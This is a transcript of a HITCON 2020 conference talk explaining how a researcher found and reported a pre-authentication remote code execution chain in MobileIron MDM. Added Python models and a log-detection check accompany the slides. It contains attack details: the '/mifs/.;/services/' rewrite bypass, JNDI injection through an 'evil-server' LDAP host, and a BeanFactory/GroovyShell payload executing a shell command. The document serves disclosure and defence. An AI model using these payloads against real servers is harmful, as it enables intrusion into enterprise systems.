How I Hacked Facebook Again! - HITCON 2020
TRANSCRIPT
![Page 1: How I Hacked Facebook Again! - HITCON 2020 I Hacked Facebook...How I Hacked facebook Again! by Orange Tsai Orange Tsai •Principal security researcher at DEVCORE •Captain of HITCON](https://reader035.vdocuments.net/reader035/viewer/2022062318/60460840b0dd11475c3635af/html5/thumbnails/1.jpg)
How I Hacked Facebook Again!
by Orange Tsai
Orange Tsai
• Principal security researcher at DEVCORE
• Captain of HITCON CTF team
• 0day researcher, focusing on Web/Application security
• @orange_8361
Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs
Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
Black Hat USA 2019
Disclaimer: every vulnerability in this talk was reported through the proper, legal process and has been fixed.
MDM (Mobile Device Management)
https://www.manageengine.com/products/desktop-central/images/MDM_features.png
Common MDM solutions
• VMware AirWatch
• MobileIron
• Microsoft Intune
• Trend Micro Mobile Security
• IBM MaaS360
• Jamf Pro
• Citrix XenMobile
• Apple DEP / Profile Manager
• Sophos Mobile Control
• ManageEngine
Why MobileIron?
1. According to the vendor's website, at least 20,000+ enterprises use it
2. At least 15% of the Fortune Global 500 use it, and their instances are exposed to the Internet
3. The most widely used MDM among Taiwanese enterprises
4. Facebook uses it!
How to start?
How do you get it running? Painful.
Architecture
(Diagram labels: Tomcat / MI Server; Apache on 443 and 8443 as reverse proxy; MI Protocol on 9997 through a TLS proxy.)
Finding bugs!
1. Everything that should be protected is protected
2. Not easy to exploit
3. But not that hard either
Vulnerability
(Architecture diagram: Tomcat / MI Server; 443 Apache and 8443 Apache as reverse proxy; 9997 MI Protocol through the TLS proxy.)
Web Service speaks Hessian!
(Same architecture diagram.)
Touch through Management Interface
(Same architecture diagram.)
Touch through User Interface…??? ❌
(Same architecture diagram.)
Rewrite Rules :(
RewriteRule ^/mifs/services/(.*)$ … [R=307,L]
RewriteRule ^/mifs/services - [F]
RewriteRule ^/mifs/services/(.*)$ … [R=307,L]
RewriteRule ^/mifs/services - [F]
/mifs/services/fooService → matched by the rules (redirected or forbidden)
/mifs/.;/services/fooService → matched by neither rule, because Apache tests the raw request path. Tomcat, however, strips the ";" path parameter from that segment and collapses the remaining "." segment, so the request is served as /mifs/services/fooService: the web service is reachable through the user-facing interface after all.
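The Apache/Tomcat mismatch above, modelled in Python as an added example (this is not code from the talk or from MobileIron): apache_decision applies the two RewriteRules to the raw request path the way mod_rewrite does, tomcat_normalize is a simplified model of servlet-container normalisation (path parameters after ";" dropped per segment, "." and ".." resolved; percent-decoding and other Tomcat details are deliberately left out), and hardened_decision shows the fix of matching on the normalised path. The access-log lines are constructed for the detection check and come from no real system.

```python
import re

# The two RewriteRules from the slide, as regexes over the raw request path.
REDIRECT_RULE = re.compile(r"^/mifs/services/(.*)$")   # … [R=307,L]
FORBID_RULE = re.compile(r"^/mifs/services")           # - [F]


def apache_decision(raw_path):
    """mod_rewrite model: rules run in order, the L flag stops after the 307."""
    if REDIRECT_RULE.match(raw_path):
        return "307"
    if FORBID_RULE.match(raw_path):
        return "403"
    return "pass"


def tomcat_normalize(raw_path):
    """Simplified model of the path Tomcat routes on: ';param' removed from every
    segment, '.' segments dropped, '..' segments resolved."""
    segments = []
    for seg in raw_path.split("/"):
        seg = seg.split(";", 1)[0]          # '.;' becomes '.', 'x;jsessionid=1' becomes 'x'
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def reaches_services(raw_path):
    """True when Apache lets the request through AND Tomcat routes it under /mifs/services/."""
    return (apache_decision(raw_path) == "pass"
            and tomcat_normalize(raw_path).startswith("/mifs/services/"))


def hardened_decision(raw_path):
    """Fix: apply the rules to the path the backend will actually see."""
    return apache_decision(tomcat_normalize(raw_path))


# Constructed access-log lines (not from any real system) for the detection check.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2020:10:00:00 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Aug/2020:10:00:01 +0000] "POST /mifs/services/fooService HTTP/1.1" 307 0',
    '198.51.100.7 - - [01/Aug/2020:10:00:02 +0000] "POST /mifs/.;/services/fooService HTTP/1.1" 200 412',
]
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def flag_bypass_attempts(lines):
    """Return (method, raw_path) for requests whose raw path dodged the rules
    but normalises into /mifs/services/ (the '/.;/' trick)."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and reaches_services(m.group("path")):
            hits.append((m.group("method"), m.group("path")))
    return hits
```

Running flag_bypass_attempts over a real access log is a cheap retrospective check: a 200 on a path that only normalises into /mifs/services/ is exactly the request the rules were meant to stop.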
Hessian Deserialization
• Java Unmarshaller Security: a paper written by @mbechler in May 2017
• Known gadgets for Hessian deserialization:
  Gadget Name   Effect
  Spring-AOP    JNDI Injection
  XBean         JNDI Injection
  Resin         JNDI Injection
  ROME          RCE
What is JNDI Injection?
JNDI is an API provided by Java that lets developers dynamically look up and access objects, e.g. a JDBC resource such as:
jdbc:mysql://localhost:3306/database
Why JNDI Injection?
CVE-2015-2590 - Pawn Storm (APT28, Fancy Bear)
Hackers back then vs. hackers now
JNDI/LDAP Injection
1. Hessian deserialization triggers a connection to the evil LDAP server
2. The evil LDAP server replies with a Naming Reference carrying a Factory and URLCodeBase=http://evil-server/
3. The class loader can't find the Factory class, so it fetches it through our URLCodeBase
4. The evil server returns the evil Java class
5. Boom! RCE!
(Diagram: Hacker → MobileIron: payload (1); MobileIron → evil server: LDAP connection (2), JNDI Reference back (3), HTTP connection to the codebase (4), evil class back (5).)
Java mitigated JNDI/LDAP remote class loading in Oct 2018 (CVE-2018-3149)
JNDI/LDAP Injection after Oct 2018
1. Hessian deserialization still triggers a connection to the evil LDAP server
2. The evil LDAP server still replies with a Naming Reference carrying a Factory and URLCodeBase=http://evil-server/
3. The class loader can't find the Factory class, but it no longer fetches it through the URLCodeBase: com.sun.jndi.ldap.object.trustURLCodebase now defaults to false
4. So no evil Java class is returned
5. And no RCE
(Diagram as before, with the HTTP connection and the evil class no longer happening.)
The bypass!
What's next?
Steps 1 and 2 still work: the Hessian payload makes MobileIron open an LDAP connection to the evil server, and the server can still hand back a Naming Reference. What the mitigation removed is only the remote URLCodeBase.
A Reference to a local factory, one already on the server's classpath, is still available!
(Diagram as before.)
Leverage the Local Factory
• org.apache.naming.factory.BeanFactory (Tomcat 6-8)
• If the reference contains a forceString, then:
  • Parse the forceString as key=value pairs
  • Invoke the value as a setter on the freshly created bean to set the specified field, for example:

  import javax.naming.StringRefAddr;
  import org.apache.naming.ResourceRef;

  // Reference to a class on the local classpath, resolved by Tomcat's own BeanFactory
  ResourceRef ref = new ResourceRef(
      "tw.orange.User", null, "", "", true,
      "org.apache.naming.factory.BeanFactory", null);
  // forceString: property "name" is populated by calling the method "setName"
  ref.add(new StringRefAddr("forceString", "name=setName"));
  // the string passed to that method
  ref.add(new StringRefAddr("name", "orange"));

  Result: new tw.orange.User().setName("orange")
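A Python model, added here and not part of the talk or of any Java library, of the two behaviours described in the JNDI/LDAP Injection steps and in the BeanFactory slides: resolve() stands in for the JNDI client's factory lookup after CVE-2018-3149 (a factory that would have to come from a remote URLCodeBase is refused, a factory already on the classpath is still used), and BeanFactory models the forceString handling (each prop=method pair makes the factory call that method by name with the matching string address). User and Shell are constructed stand-ins for tw.orange.User and groovy.lang.GroovyShell; Shell.evaluate only records the script and executes nothing. HardenedBeanFactory and the name hardened.BeanFactory are my own mitigation sketch, not Tomcat's actual fix.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Reference:
    # Model of javax.naming.Reference: class to build, factory that builds it,
    # optional remote codebase for the factory (URLCodeBase), string addresses.
    class_name: str
    factory: str
    factory_location: Optional[str] = None
    addrs: dict = field(default_factory=dict)


class LoadError(Exception):
    pass


# Constructed stand-ins for classes already present on the target's classpath.
class User:                      # stands in for tw.orange.User
    def __init__(self):
        self.name = None

    def setName(self, value):
        self.name = value


class Shell:                     # stands in for groovy.lang.GroovyShell
    def __init__(self):
        self.executed = []

    def evaluate(self, script):  # only records the script; runs nothing
        self.executed.append(script)


class BeanFactory:
    # Model of org.apache.naming.factory.BeanFactory's forceString handling:
    # each "prop=method" pair makes the factory call obj.method(addrs[prop]) by name.
    def get_object_instance(self, ref, classpath):
        cls = classpath.get(ref.class_name)
        if cls is None:
            raise LoadError("class not found: " + ref.class_name)
        obj = cls()
        for pair in filter(None, ref.addrs.get("forceString", "").split(",")):
            prop, method = pair.split("=", 1)
            getattr(obj, method)(ref.addrs[prop])   # any one-String-argument method
        return obj


class HardenedBeanFactory(BeanFactory):
    # Mitigation sketch (my design, not Tomcat's patch): forceString may only name
    # the conventional setter for its property, never an arbitrary method.
    def get_object_instance(self, ref, classpath):
        for pair in filter(None, ref.addrs.get("forceString", "").split(",")):
            prop, method = pair.split("=", 1)
            if method != "set" + prop[:1].upper() + prop[1:]:
                raise LoadError("forceString target is not a setter: " + method)
        return super().get_object_instance(ref, classpath)


CLASSPATH = {
    "tw.orange.User": User,
    "groovy.lang.GroovyShell": Shell,
    "org.apache.naming.factory.BeanFactory": BeanFactory,
    "hardened.BeanFactory": HardenedBeanFactory,   # hypothetical name
}


def resolve(ref, trust_url_codebase=False, classpath=CLASSPATH):
    # JNDI client after CVE-2018-3149: a factory missing from the classpath is refused
    # when it would come from a remote codebase (unless trusted); a factory that IS on
    # the classpath is still instantiated and handed the reference.
    factory_cls = classpath.get(ref.factory)
    if factory_cls is None:
        if ref.factory_location and not trust_url_codebase:
            raise LoadError("refusing to load factory from remote codebase")
        raise LoadError("factory not on classpath")  # pre-2018 the HTTP fetch happened here
    return factory_cls().get_object_instance(ref, classpath)


def attempt(ref):
    # Returns the built object, or the error string when the lookup is refused.
    try:
        return resolve(ref)
    except LoadError as e:
        return str(e)


def remote_codebase_outcome():
    # Classic chain, steps 2-3: remote factory + URLCodeBase -> blocked.
    return attempt(Reference("evil.Payload", "evil.Factory", "http://evil-server/"))


def local_factory_benign(factory="org.apache.naming.factory.BeanFactory"):
    # The slide's example: forceString name=setName sets User.name.
    return attempt(Reference("tw.orange.User", factory,
                             addrs={"forceString": "name=setName", "name": "orange"}))


def local_factory_gadget(factory="org.apache.naming.factory.BeanFactory"):
    # The bypass: the same mechanism aimed at a class whose method evaluates code.
    return attempt(Reference("groovy.lang.GroovyShell", factory,
                             addrs={"forceString": "foo=evaluate", "foo": '"uname -a".execute()'}))
```

The point the model makes concrete: the 2018 fix only closed the download of unknown factory classes; as long as a factory that is already loadable will call attacker-named methods on an attacker-named class, the reference itself stays a code-execution primitive.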
Method Invoke
javax.el.ELProcessor().eval("evil…")
• Tomcat 8.5+ only, but our remote version is 7.0.92
groovy.lang.GroovyClassLoader().parseClass("…")
• Make meta-programming great again!
• Groovy 2.0+ only, but our remote version is 1.5.6
groovy.lang.GroovyShell().evaluate("…")
• New Groovy chain! Works on all versions
• https://github.com/welk1n/JNDI-Injection-Bypass/pull/1
Bypass with Local Reference
1. Hessian deserialization triggers a connection to the evil LDAP server
2. The evil LDAP server replies with:
   • a local factory: org.apache.naming.factory.BeanFactory
   • a local object reference: groovy.lang.GroovyShell, with properties:
     • forceString is foo=evaluate
     • foo is "uname -a".execute()
3. The factory loads and populates the object
4. Boom! RCE!
(Diagram: Hacker → MobileIron: payload (1); MobileIron → evil server: LDAP connection, reply carries the local factory and the object reference (2); factory populates the object (3); RCE (4).)
Bypass with Local Reference (over LDAP, as above): ❌
Bypass with Local Reference (over RMI)
1. Hessian deserialization triggers an RMI connection to the evil RMI server
2. The evil RMI server replies with the same local factory (org.apache.naming.factory.BeanFactory) and local object reference (groovy.lang.GroovyShell with forceString foo=evaluate and foo "uname -a".execute())
3. The factory loads and populates the object
4. Boom! RCE!
❌
Re-read the paper.
Why was this sentence added?
Git Blame
Exploit with JNDI Bypass
1. Hessian deserialization triggers a connection to the evil LDAP server
2. The evil LDAP server replies with the local factory org.apache.naming.factory.BeanFactory and a local object reference to groovy.lang.GroovyShell with properties forceString = foo=evaluate and foo = "uname -a".execute()
3. The factory loads and populates the object
4. Boom! RCE!
(Diagram: Hacker → MobileIron: payload (1); MobileIron → evil server: LDAP connection returning the local factory and object reference (2); object populated (3); RCE (4).)
Exploit with New Gadget
1. Hessian deserialization directly triggers local Groovy gadgets → Boom! RCE!
(Diagram: only Hacker → MobileIron: payload (1).)
Demo: https://youtu.be/hGTLIIOb14A
Vulnerability Report